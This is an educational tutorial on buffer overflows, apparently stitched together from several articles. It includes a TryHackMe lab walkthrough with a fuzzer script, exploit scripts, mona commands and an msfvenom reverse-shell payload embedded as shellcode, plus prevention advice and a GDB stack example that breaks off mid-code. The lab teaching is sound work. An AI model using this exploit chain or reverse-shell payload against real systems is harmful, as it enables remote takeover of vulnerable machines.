Buffer Overflow Basics

Buffer overflow is a security vulnerability that occurs when a program writes more data to a buffer than it can hold, potentially allowing attackers to execute malicious code. Understanding buffer overflows is essential for cybersecurity beginners, as they highlight the importance of secure coding practices and proper input validation. The document discusses types of buffer overflows, examples of vulnerable code, and methods to exploit and analyze these vulnerabilities using tools like Immunity Debugger and fuzzing techniques.

Uploaded by

Menberu Munye

Buffer overflow is a vulnerability where a program tries to store more data in a buffer than it can
hold, potentially overwriting important data or enabling an attacker to execute malicious code.
While these attacks are becoming less common due to better security practices, understanding
buffer overflows is still vital for beginners in cybersecurity. They can help one understand the
importance of secure coding practices and the severity of vulnerabilities arising from poor user
input handling.

What is a Buffer?

A buffer is a temporary storage area in computer memory that holds data while it is being moved
from one place to another. Buffering helps avoid data loss and keeps data in the correct order
when the producer and the consumer of the data run at different speeds. Buffers are commonly
used to store input from users, data being read from files, and data being transmitted over a
network.

Buffer Overflow

A buffer overflow vulnerability occurs when a program tries to store more data in a buffer than
it can hold. The excess data overwrites adjacent memory locations, causing unpredictable
behaviour and, in some cases, allowing attackers to execute malicious code. Typical causes are
missing input validation, programming bugs, and unexpected user input.

One must have a fundamental understanding of computer memory to comprehend stack-based
overflow attacks. Computer memory is a storage location for data and instructions,
encompassing numeric values, characters, images, and any other data type. During the early
years of computing, memory was expensive, so data and instructions were stored in the same
memory to avoid wasting it.

Information is kept at sequential addresses in a computer’s memory. When a program creates a
buffer, it reserves a fixed number of bytes to hold that data. If the program attempts to write
more than the reserved bytes can accommodate, the excess data overwrites whatever is stored in
the neighbouring memory. This can corrupt other data and cause the program to malfunction or
behave unexpectedly.

Let us now look at example code to see a buffer overflow in practice. The code snippet below
includes two header files, stdio.h and string.h. The stdio.h header declares the input/output
functions, and string.h declares functions for manipulating strings. In the main function, we
declare the buffer variable with a size of 8 characters. The gets() function reads a line of text
from the console and stores it in the buffer array without checking its length.

We can now compile and run the code with a C compiler.

The program runs, but it aborts with a “stack smashing detected” error when the input is longer
than the buffer can hold. gets() writes the excess data past the end of the buffer into adjacent
stack memory, and the compiler’s stack protection detects the corruption and terminates the
program.

#include <stdio.h>
#include <string.h>

int main() {
    char buffer[8];

    printf("Enter your name: ");
    gets(buffer);   /* unsafe: gets() does not check the length of the input */
    printf("Hello, %s!\n", buffer);

    return 0;
}

We can use the fgets() function in our program to prevent this issue. fgets() lets you specify the
maximum number of characters to read from the input stream, so the stored input can never be
longer than the buffer. For this to work, the size passed to fgets() must not exceed the actual
size of the buffer; passing sizeof(buffer), as below, keeps the two in sync.

#include <stdio.h>
#include <string.h>

int main() {
    char buffer[8];

    printf("Enter your name: ");
    fgets(buffer, sizeof(buffer), stdin);   /* reads at most sizeof(buffer) - 1 characters */
    printf("Hello, %s!\n", buffer);

    return 0;
}

Because fgets() stops reading once the buffer is full, longer input is truncated instead of
overflowing the buffer, and the program is no longer terminated.

Types of Buffer Overflow

Let us now look at some types of buffer overflows:


Stack-based buffer overflow: A stack-based buffer overflow denotes a security vulnerability
where a cyber-attacker overloads a buffer residing on the stack, exploiting it to change the return
address and execute arbitrary code.

Heap-based buffer overflow: A heap-based buffer overflow happens when an attacker overflows
a buffer on the heap. Such an attack can lead to exploiting a vulnerability of memory
management, which then causes arbitrary executable code to run.

Format string vulnerability: A format string vulnerability arises when an attacker controls the
format string passed to functions like printf. Format specifiers such as %x and %n then let the
attacker read from or write to memory.

Integer overflow: An integer overflow happens when the result of an arithmetic operation
exceeds the capacity of its integer type (8-bit to 64-bit) and wraps around. If the wrapped value
is used as a buffer size or index, it can lead to buffer overflows and memory corruption.

Off-by-one error: An off-by-one error is a programming mistake in which a program writes one
element more than a buffer can hold, for example by allocating a buffer that is one byte too
small for the data or by looping one iteration too far. The extra byte overflows into adjacent
memory, which attackers can sometimes use to execute malicious code.
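To make the integer overflow entry above concrete, here is a minimal Python sketch of a length calculation that wraps around in an 8-bit unsigned integer. Python integers do not overflow, so the wrap is emulated with a mask; the function name add_u8 and the sizes are illustrative assumptions, not taken from any real program.

```python
def add_u8(a: int, b: int) -> int:
    """Add two values the way an 8-bit unsigned integer would, wrapping at 256."""
    return (a + b) & 0xFF


header_len = 200  # hypothetical sizes chosen so the sum exceeds 255
body_len = 100

# The true total is 300, which does not fit in 8 bits.
wrapped_total = add_u8(header_len, body_len)
print(wrapped_total)  # 44

# A program that allocates `wrapped_total` bytes but then copies
# header_len + body_len bytes would write this many bytes past the end.
bytes_written_past_end = (header_len + body_len) - wrapped_total
print(bytes_written_past_end)  # 256
```

The size check passes on the wrapped value while the copy uses the real one, which is how an integer overflow turns into a buffer overflow.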

Exploitation

To demonstrate the buffer overflow vulnerability, we will use the TryHackMe room: Buffer
Overflow Prep.

After a port scan with nmap, port 1337 was found to be open and vulnerable. We can use netcat
to connect to that port.

nc MACHINE_IP 1337

For demonstration purposes, we will only show one instance (OVERFLOW1); feel free to
go ahead and try out all 10 instances. Let’s jump into the next step.

To access the machine, TryHackMe provides the following credentials for logging on using RDP:

Username: admin

Password: password

You can use any preferred tool to log in to the machine. Here we will be using Remmina.
After successfully logging in, right-click the Immunity Debugger icon on the Desktop and choose
“Run as administrator.”

Immunity Debugger is a popular debugger for Windows that can be used for analyzing buffer
overflow vulnerabilities and exploits. When using Immunity Debugger to analyze buffer
overflow vulnerabilities, one of the key features is the ability to set breakpoints and examine the
state of memory at various points in the program execution. This can help identify where the
overflow occurs in the code and what data is being overwritten.

The main window of Immunity Debugger is divided into four panels:

Disassembly Panel: This panel shows the disassembled code of the program, which can help
identify the location of the vulnerability and the path of execution leading up to it.

Registers Panel: This panel shows the state of the processor registers, which can help identify
how the program uses memory and where a buffer overflow may occur.

Memory Dump Panel: This panel shows a hex dump of the program’s memory, which can help
examine the overflow buffer’s contents.

Stack Panel: This panel shows the contents of the program’s stack, including any buffer
overflows that may have occurred. It can also help identify the return address that an attacker
may be trying to overwrite.

The oscp.exe binary was custom-written for this room and contains ten different simple
stack-based buffer overflows. Each overflow has a distinct EIP offset and a predefined set of
bad characters.

To open the “oscp.exe” binary file in Immunity Debugger, you should click on the open file icon
or go to the “File” menu and choose “Open.” After that, access the “vulnerable-apps” folder, the
folder located on the desktop of the admin user, and then the “oscp” folder. Finally, select the
“oscp” binary file and click the “Open” button.

To start the binary, click the red play button.


Fuzzing can be used to generate a large number of inputs that exceed the length of the buffer and
trigger an overflow. This can help identify the exact point in the program where the overflow
occurs and the data that is being overwritten.

On your Kali machine, create a file named fuzzer.py with the content given below. This script
sends increasingly long strings to the binary until it stops responding.

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.244.233"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "

# Start with 100 "A" characters and grow by 100 on every iteration.
string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)
    except:
        # No response within the timeout: the server has most likely crashed.
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)

Let us now run the fuzzing script with python3:

python3 fuzzer.py

After running the fuzzing script, the program crashes at 2000 bytes.

We will now generate a cyclic (non-repeating) pattern that is 400 bytes longer than the string
that crashed the server, using the pattern_create.rb tool from the Metasploit framework; the
extra length gives a margin for error. We use this pattern to find the offset.

An offset is the distance between the beginning of a buffer and the location of a specific
data element within that buffer. Here, the element of interest is the saved return address: if a
program writes more data to a buffer than it can hold and an attacker controls that data, the
bytes at the right offset overwrite the program’s return address or other important information
in adjacent memory. By knowing the offset, an attacker can control exactly which memory
locations are overwritten and potentially gain unauthorized access or execute arbitrary code.
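To make the idea of an offset concrete, the sketch below builds a pattern in the same "Aa0Aa1Aa2..." style and looks up a 4-byte value in it. It is an illustrative approximation written for this walkthrough, not Metasploit's or mona's actual implementation; the function names pattern_create and pattern_offset are assumptions, and the sketch only covers patterns up to 20280 characters.

```python
import string
from typing import Optional


def pattern_create(length: int) -> str:
    """Build an 'Aa0Aa1Aa2...' style pattern of the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value: int, length: int) -> Optional[int]:
    """Return the offset of the 4 bytes found in EIP, or None if absent."""
    # EIP is displayed as a little-endian integer, so convert it back to
    # the byte order in which the characters were sent.
    needle = eip_value.to_bytes(4, "little").decode("latin-1")
    index = pattern_create(length).find(needle)
    return index if index >= 0 else None


pattern = pattern_create(2400)
print(pattern[:12])  # Aa0Aa1Aa2Aa3

# Pretend the 4 pattern bytes at position 1978 ended up in EIP.
fake_eip = int.from_bytes(pattern[1978:1982].encode("latin-1"), "little")
print(pattern_offset(fake_eip, 2400))  # 1978
```

Because every 4-character window of the pattern is distinct, the value found in EIP after a crash identifies exactly one position in the input.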

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

Before each run, restart the process in Immunity Debugger on the RDP connection: reopen
oscp.exe using the same method as before, then click the red play icon to start it. Repeat this
every time you run the exploit.py file, which you will need to run multiple times with
incremental modifications.

Insert the above-generated payload into the payload value of the code exploit.py shown below
and run it.

import socket

ip = "10.10.244.233"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1A..."
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except:
    print("Could not connect.")

ESP (Extended Stack Pointer) is a 32-bit register that points to the top of the stack during
program execution. The stack is an area of memory used for temporarily storing data and
addresses. The ESP register is used to push elements onto the stack and pop them off it. Since
the stack grows downward in memory, ESP starts at a higher memory address and is decremented
each time data is added to the stack.

EBP (Extended Base Pointer) is a 32-bit register that serves as a reference for accessing local
variables and parameters on the stack within functions. It is the primary access point for the
current function’s stack frame, which contains essential elements like the function’s
parameters, return address, and local variables. Typically, the EBP register is set at the start
of a function and used to access local data and function parameters.

EIP (Extended Instruction Pointer) is a 32-bit register that holds the memory address of the next
instruction the processor will execute. The processor updates the EIP register automatically as
instructions are executed, which makes it possible for the program to execute its instructions
sequentially.

In summary, the ESP register points to the top of the stack, which grows downward in memory;
the EBP register serves as a base pointer for accessing the current function’s stack frame; and
the EIP register contains the memory address of the next instruction to execute.
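The downward growth of the stack can be illustrated with a toy model. The class below is a simplified sketch for explanation only: the name Stack32, the start address 0x1000, and the pushed values are arbitrary assumptions, and a real CPU does this in hardware rather than with a dictionary.

```python
class Stack32:
    """Toy model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, top_address: int) -> None:
        self.esp = top_address  # stack pointer
        self.memory = {}        # address -> 32-bit value

    def push(self, value: int) -> None:
        self.esp -= 4                  # ESP is decremented first...
        self.memory[self.esp] = value  # ...then the value is stored there

    def pop(self) -> int:
        value = self.memory.pop(self.esp)
        self.esp += 4                  # ESP moves back up
        return value


stack = Stack32(top_address=0x1000)  # arbitrary illustrative start address
stack.push(0xDEADBEEF)
stack.push(0x12345678)
print(hex(stack.esp))    # 0xff8
print(hex(stack.pop()))  # 0x12345678
print(hex(stack.esp))    # 0xffc
```

Each push lowers ESP by four bytes and each pop raises it again, so the most recently pushed value always sits at the lowest used address.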

To control the EIP, an attacker needs to determine the exact offset at which the buffer overflow
occurs and the exact location in memory where they can place their malicious code. We can use
the mona python script to find the offset variable.

Mona Configuration

Mona is a Python script used with Immunity Debugger to automate the identification and
exploitation of buffer overflow vulnerabilities. It helps with:

Finding Bad Characters

Finding Jump Pointers

Generating Payloads

Creating Exploits

The mona script comes preinstalled on the Windows machine, so no installation is needed for
this room.

Set mona’s working folder with the following command:

!mona config -set workingfolder c:\mona\%p

Running exploit.py with the pattern as its payload crashes the oscp.exe server once again. In
Immunity Debugger, run the following mona command in the command input box at the bottom of
the screen, changing the distance to match the length of the pattern you generated:

!mona findmsp -distance 2400

In mona’s output, look for the offset at which EIP was overwritten; in this walkthrough it is 1978.


Some byte values, known as “bad characters,” are altered or dropped by the target program
before they reach memory, or cut the input short. Bad characters can include null bytes, newline
characters, carriage returns, and other control characters. Their presence in a payload corrupts
it and interferes with its intended execution, so they must be identified and excluded.

Set the offset value in the exploit code to the EIP offset. Set the retn value to four Bs (BBBB).

Generate a bytearray using mona, and exclude the null byte (\x00) by default.

!mona bytearray -b "\x00"
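An equivalent byte sequence can also be built in Python, which is convenient when pasting it into the script. This is a minimal sketch and not mona's own code; the function name build_byte_sequence is an assumption made for illustration.

```python
def build_byte_sequence(excluded: bytes = b"\x00") -> bytes:
    """Return every byte value 0x00-0xff in order, skipping the excluded ones."""
    return bytes(b for b in range(256) if b not in excluded)


candidates = build_byte_sequence(b"\x00")
print(len(candidates))       # 255
print(candidates[:4].hex())  # 01020304

# Format the bytes as escape sequences for pasting into a string literal.
as_literal = "".join("\\x{:02x}".format(b) for b in candidates)
print(as_literal[:16])       # \x01\x02\x03\x04
```

Passing a longer exclusion list, such as b"\x00\x07", produces the shorter sequence needed on later iterations of the bad character search.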

Copy the generated bytearray to the payload value of the exploit code.

The code will look similar to the code shown below. Restart oscp.exe in the Immunity debugger
and run the modified exploit.py script again.

import socket

ip = "10.10.244.233"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except:
    print("Could not connect.")

Make a note of the address to which the ESP register points and use it in the following mona
command:

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

Not all of the characters mona reports are necessarily bad. Sometimes a bad character corrupts
the next byte as well, or even affects the rest of the string. The first bad character in the
list is the null byte (\x00), which we already removed from the file. A simple approach is
therefore to treat the first value of each consecutive pair as bad and to ignore the second: for
example, mark \x07 as bad but not \x08.

Create a new bytearray in mona that excludes the newly marked characters as well as \x00. Then
update the payload variable in your exploit.py script to remove the newly marked characters too.

Restart oscp.exe, run the exploit again, and repeat the bad character comparison until the
result status is “Unmodified.” This indicates that no bad characters remain.
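The comparison itself is simple to picture. The sketch below is an illustration of the idea rather than what mona compare actually does internally; the function name find_mismatches and the corrupted dump are hypothetical, constructed so that 0x07 is mangled and also damages the byte that follows it.

```python
from typing import List


def find_mismatches(sent: bytes, in_memory: bytes) -> List[int]:
    """Return the sent byte values whose position holds a different byte in memory."""
    return [s for s, m in zip(sent, in_memory) if s != m]


sent = bytes(range(1, 256))

# Hypothetical dump: 0x07 was mangled and also corrupted the byte after it.
dump = bytearray(sent)
dump[sent.index(0x07)] = 0x0A
dump[sent.index(0x08)] = 0x0D

mismatches = find_mismatches(sent, bytes(dump))
print([hex(b) for b in mismatches])  # ['0x7', '0x8']
```

Both 0x07 and 0x08 show up as mismatches here, but only 0x07 needs to be excluded on the next run; if 0x08 is still reported afterwards, it is genuinely bad as well.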

Next, search for a jump point with mona, making sure to update the -cpb option with all the
badchars you identified (including \x00):

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"


In a buffer overflow, a “jump point” is a specific location in the program’s memory to which an
attacker can redirect execution by overwriting the return address on the stack.

When a program calls a function, the address to return to in the calling function is stored on
the stack so that the processor can resume there when the called function completes. If an
attacker can overwrite this return address with a memory location under their control, they can
reroute the program’s execution flow to their own code.

To update your exploit.py script, select an address and assign it to the “retn” variable. Write
the address backwards, since the system uses little-endian byte order. For instance, if the
address shown in Immunity is \x01\x02\x03\x04, write it as \x04\x03\x02\x01 in your exploit.
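Reversing the bytes by hand is error-prone, so the conversion can be left to Python's struct module. In this sketch the address 0x625011AF is an illustrative assumption, chosen because its little-endian form matches the retn bytes used in the final script of this walkthrough.

```python
import struct

address = 0x625011AF  # illustrative address as displayed in the debugger

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
retn_bytes = struct.pack("<I", address)
print(retn_bytes)  # b'\xaf\x11Pb'

# The exploit scripts build the buffer as a str and encode it with latin-1,
# so decode the packed bytes the same way to get a matching str.
retn = retn_bytes.decode("latin-1")
print(retn == "\xaf\x11\x50\x62")  # True
```

Python prints 0x50 and 0x62 as the ASCII characters P and b, which is why the first output looks shorter than four escape sequences.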
Execute this msfvenom command on Kali, replacing the LHOST value with the IP address of your
Kali VPN interface and updating the -b option with all the bad characters identified:

msfvenom -p windows/shell_reverse_tcp LHOST=10.2.32.24 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

An encoder was most likely used to generate the payload, so it needs some space in memory to
unpack itself. You can provide this by setting the padding variable to a string of 16 or more
“No Operation” (\x90) bytes:

padding = "\x90" * 16

Integrate the generated shellcode strings into the payload variable of your exploit.py script
using the notation shown in the code below:

import socket

ip = "10.10.11.163"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = ("\xda\xc4\xd9\x74\x24\xf4\x5d\xbe\xab\x9d\xc3\x98\x33\xc9"
"\xb1\x52\x31\x75\x17\x03\x75\x17\x83\x6e\x99\x21\x6d\x8c"
# ......................................................
"\x48\xca\xa6\x63\xd5\x9f\x0a\xee\xe6\x4a\x48\x17\x65\x7e"
"\x31\xec\x75\x0b\x34\xa8\x31\xe0\x44\xa1\xd7\x06\xfa\xc2"
"\xfd")
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except:
    print("Could not connect.")

Start a Netcat listener on your Kali machine on the LPORT you specified in the msfvenom
command, which is 4444 unless you changed it.

Restart the ‘oscp.exe’ process in Immunity, then execute the modified ‘exploit.py’ script again.

If the exploit is successful, the listener receives a reverse shell obtained through the buffer
overflow.

Detecting Buffer Vulnerability

Buffer overflow vulnerabilities may be discovered by combining static and dynamic analysis
methods. The program’s source code or compiled binary is analyzed for potential vulnerabilities
when performing static analysis. On the other hand, dynamic analysis requires the program to be
executed and its behaviour to be observed to identify signs of vulnerability exploitation.

The identification of buffer overflow vulnerabilities can be achieved using various tools, such as
fuzzers, debuggers, and memory analysis tools. Fuzzers create many test cases with random
input data to explore vulnerabilities. Debuggers can help examine the program’s execution and
analyze the state of the memory and registers at every stage.

Prevention

Preventing buffer overflow attacks can be accomplished by implementing secure coding
practices, like validating user input, utilizing safe string manipulation functions, and accurately
calculating buffer sizes. Additionally, runtime protections such as data execution prevention
(DEP), address space layout randomization (ASLR), stack canaries, and heap protections can
help secure your system against such attacks.

A buffer overflow occurs when the size of information written to a memory location exceeds
what it was allocated. This can cause data corruption, program crashes, or even the execution of
malicious code.

While C, C++, and Objective-C are the main languages which have buffer overflow
vulnerabilities (as they deal more directly with memory than many interpreted languages), they
are the foundation of much of the internet.

Even if the code is written in a 'safe' language (like Python), if it calls on any libraries written in
C, C++, or Objective C, it could still be vulnerable to buffer overflows.

Memory Allocation

In order to understand buffer overflows, it's important to understand a little about how programs
allocate memory. In a C program, you can allocate memory on the stack, with a size fixed at
compile time, or on the heap, with a size chosen at run time.

To declare a variable on the stack: int numberPoints = 10;

Or, on the heap: int* ptr = malloc (10 * sizeof(int));

Buffer overflows can occur on the stack (stack overflow) or on the heap (heap overflow).

In general, stack overflows are more commonly exploited than heap overflows. This is because
the stack holds a frame for each nested function call, and each frame stores the return address
in the calling function to which execution should return after the function has finished running.
This return address can be replaced with the address of a piece of malicious code.

As heaps less commonly store these return addresses, it's much harder to launch an exploit
(though not impossible). Memory on the heap typically contains program data and is
dynamically allocated as the program runs. This means that a heap overflow would likely have to
overwrite a function pointer – harder and less effective than a stack overflow.

As stack overflows are the more commonly exploited type of buffer overflow, we'll briefly dig
into exactly how they work.

Stack Overflows

When an executable is run, it runs within a process, and each process has its own stack. As the
process executes the main function, it will find both new local variables (which will be pushed
onto the top of the stack) and calls to other functions (which will create a new stackframe).

A diagram of a stack, for clarity:

https://en.wikipedia.org/wiki/Stack_(abstract_data_type)

So, what's a stackframe?

First, a call stack is the region of memory a running program uses to keep track of its active
function calls. It's a stack of variables and stackframes which tells the computer where to
resume execution when each function returns. There will be a stackframe for each function that
hasn't yet finished executing, with the function which is currently executing on the top of the
stack.

In order to keep track of this, a computer keeps several pointers in CPU registers:

Stack Pointer: Points to the top of the process call stack (or the last item pushed onto the stack).

Instruction Pointer: Points to the address of the next CPU instruction to be executed.

Base Pointer (BP): (also known as the frame pointer) Points to the base of the current
stackframe. It stays constant as long as the program is executing the current stackframe (though
the stack pointer will change).

For example, given the following program:

int firstFunction(int z);

int main() {
    int j = firstFunction(5);
    return 0;
}

int firstFunction(int z) {
    int x = 1 + z;
    return x;
}

Right after firstFunction has been called and the statement int x = 1+z has been executed, the
call stack holds main's stackframe at the bottom and firstFunction's stackframe on top of it.

Here, main called firstFunction (which is currently executing), so firstFunction is at the top of
the call stack. The return address is the address of the instruction in the calling function at
which execution resumes (it is taken from the instruction pointer as the stackframe is created).
Local variables which are still in scope are also on the call stack. When a function returns and
its variables go out of scope, they are 'popped' off the top of the stack.

Thus, the computer is able to keep track of which instruction needs to be executed, and in which
order. A stack overflow is designed to overwrite one of these saved return addresses with its
own, malicious address.
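The effect on a saved return address can be modelled without touching real memory. The sketch below is a deliberately simplified assumption: the toy frame holds only a 10-byte buffer followed directly by a 4-byte return address, whereas real frames also contain saved registers, padding, and possibly a stack canary. All names and addresses are illustrative.

```python
import struct

BUFFER_SIZE = 10           # size of the local buffer in the toy frame
RETURN_SLOT = BUFFER_SIZE  # in this model the return address sits right after it


def make_frame(return_address: int) -> bytearray:
    """Lay out a toy frame: a local buffer followed by a saved return address."""
    return bytearray(BUFFER_SIZE) + bytearray(struct.pack("<I", return_address))


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of the frame with no length check, like gets()."""
    frame[0:len(data)] = data


def saved_return(frame: bytearray) -> int:
    """Read back the 32-bit little-endian return address stored in the frame."""
    return struct.unpack_from("<I", frame, RETURN_SLOT)[0]


frame = make_frame(0x00400701)
unchecked_copy(frame, b"hello")  # fits inside the buffer
print(hex(saved_return(frame)))  # 0x400701

# Ten filler bytes reach the end of the buffer; the next four replace the address.
unchecked_copy(frame, b"A" * BUFFER_SIZE + struct.pack("<I", 0x41424344))
print(hex(saved_return(frame)))  # 0x41424344
```

When the function returns, execution would continue at whatever address now sits in that slot, which is why controlling those four bytes means controlling the program.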

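Example Buffer Overflow Vulnerability (C):

#include <stdio.h>

int bufferOverflow(void);

int main(void) {
    bufferOverflow();
    return 0;
}

int bufferOverflow(void) {
    char textLine[10];
    printf("Enter your line of text: ");
    gets(textLine);   /* unsafe: input longer than 9 characters overflows textLine */
    printf("You entered: %s\n", textLine);
    return 0;
}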

What are buffer overflow attacks?

Stack-based buffer overflow exploits are likely the shiniest and most common form of
exploit for remotely taking over the code execution of a process. These exploits were
extremely common 20 years ago, but since then, a huge amount of effort has gone into
mitigating stack-based overflow attacks by operating system developers, application
developers, and hardware manufacturers, with changes even being made to the standard
libraries developers use. Below, we will explore how stack-based overflows work and detail
the mitigation strategies that are put in place to try to prevent them.

Deep dive on stack-based buffer overflow attacks

Understanding stack-based overflow attacks involves at least a basic understanding of
computer memory. Memory in a computer is simply a storage place for data and instructions:
data for storing numbers, letters, images, and anything else, and instructions that tell the
computer what to do with the data. Both are stored in the same memory because memory
was prohibitively expensive in the early days of computing, and reserving it for one type of
storage or another was wasteful. Such an approach where data and instructions are stored
together is known as a Von Neumann architecture. It’s still in use in most computers to this
day, though as you will see, it is not without complications.

On the bright side, while security was not a driving factor in early computer and software
design, engineers realized that changing running instructions in memory was a bad idea, so
even as long ago as the ‘90s, standard hardware and operating systems were doing a good
job of preventing changes to instructional memory. Unfortunately, you don’t really need to
change instructions to change the behavior of a running program, and with a little
knowledge, writeable data memory provides several opportunities and methods for affecting
instruction execution.

Take this particularly contrived example:

#include <signal.h>
#include <stdio.h>
#include <string.h>

int main(){
    char realPassword[20];
    char givenPassword[20];

    strncpy(realPassword, "ddddddddddddddd", 20);
    gets(givenPassword);

    if (0 == strncmp(givenPassword, realPassword, 20)){
        printf("SUCCESS!\n");
    }else{
        printf("FAILURE!\n");
    }

    raise(SIGINT);   /* stop here so the stack can be inspected in a debugger */
    printf("givenPassword: %s\n", givenPassword);
    printf("realPassword: %s\n", realPassword);
    return 0;
}

If you don’t know the C programming language, that’s fine. The interesting thing about this
program is that it creates two buffers in memory called realPassword and givenPassword as
local variables. Each buffer has space for 20 characters. When we run the program, space
for these local variables is created in-memory and specifically stored on the stack with all
other local variables (and some other stuff). The stack is a very structured, sequential
memory space, so the relative distance between any two local variables in-memory is
guaranteed to be relatively small. After this program creates the variables, it populates
the realPassword value with a string, then prompts the user for a password and copies the
provided password into the givenPassword value. Once it has both passwords, it compares
them. If they match, it prints “SUCCESS!” If not, it prints “FAILURE!”

Here’s an example run:

msfuser@ubuntu:~$ ./example.elf
test
FAILURE!
givenPassword: test
realPassword: ddddddddddddddd

This is exactly as we’d expect. The password we entered does not match the expected
password. There is a catch here: The programmer (me) made several really bad mistakes,
which we will talk about later. Before we cover that, though, let’s open a debugger and peek
into memory to see what the stack looks like in memory while the program is executing:

msfuser@ubuntu:~$ gdb example.elf
(gdb) run
Starting program: /home/msfuser/example.elf
aaaaaaaaaaaaaaaa
FAILURE!

Program received signal SIGINT, Interrupt.
0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54
54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb)

At this point, the program has taken in the data and compared it, but I added an interrupt in
the code to stop it before exiting so we could “look” at the stack. Debuggers let us see what
the program is doing and what the memory looks like on a running basis. In this case, we are
using the GNU Debugger (GDB). The GDB command ‘info frame’ allows us to find the
location in memory of the local variables, which will be on the stack:

(gdb) info frame
Stack level 0, frame at 0x7fffffffdde0:
 rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x400701
 called by frame at 0x7fffffffde30
 source language c.
 Arglist at 0x7fffffffddd0, args: sig=2
 Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0
 Saved registers:
  rip at 0x7fffffffddd8
(gdb)

Now that we know where the local variables are, we can print that area of memory:

(gdb) x/200x 0x7fffffffddd0
0x7fffffffddd0: 0x00000000 0x00000000 0x00400701 0x00000000
0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161
0x7fffffffddf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffde00: 0x64646464 0x64646464 0x64646464 0x00646464
0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000
.

As mentioned, the stack is sequentially stored data. If you know ASCII, then you know the
letter ‘a’ is represented in memory by the value 0x61 and the letter ‘d’ is 0x64. You can see
above that they are right next to each other in memory. The realPassword buffer is right
after the givenPassword buffer.
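
One detail in the dump is easy to misread: the last word of realPassword prints as 0x00646464, which is the three bytes ‘d’, ‘d’, ‘d’ followed by the string terminator. The bytes appear reversed because x86-64 is little-endian and gdb is printing 4-byte words. Here is a minimal sketch of that conversion; the helper name little_endian_word is my own and is not part of the example program:

```c
#include <assert.h>
#include <stdint.h>

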